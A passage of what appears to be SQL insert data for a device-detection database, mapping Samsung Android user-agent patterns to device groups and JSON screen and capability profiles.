Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A310F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A310M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A5000) AppleWebKit/* (KHTML, like Gecko) Mobile/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A500FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A500W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A500Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A510M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A700FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A700H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A700YD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A7100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A710M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A710Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A8000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A800IZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-E500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-E500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-E500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-E700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-E700H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-E700M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G360BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G360F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G360G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G360GY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G360M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G360T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G360T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G360V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G361F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G361H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G388F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G530BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G530FZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G530H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G530M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G530T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G530T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G530W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G531BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G531F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G531H) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G531H) AppleWebKit/* (KHTML, like Gecko) Chrome (beta) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G531H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G531M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G5500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G600FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G7102) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G800H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G800M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G800Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G850F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G850M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G870A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G870F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G9006V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900F) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900R7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G900W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-G901F) 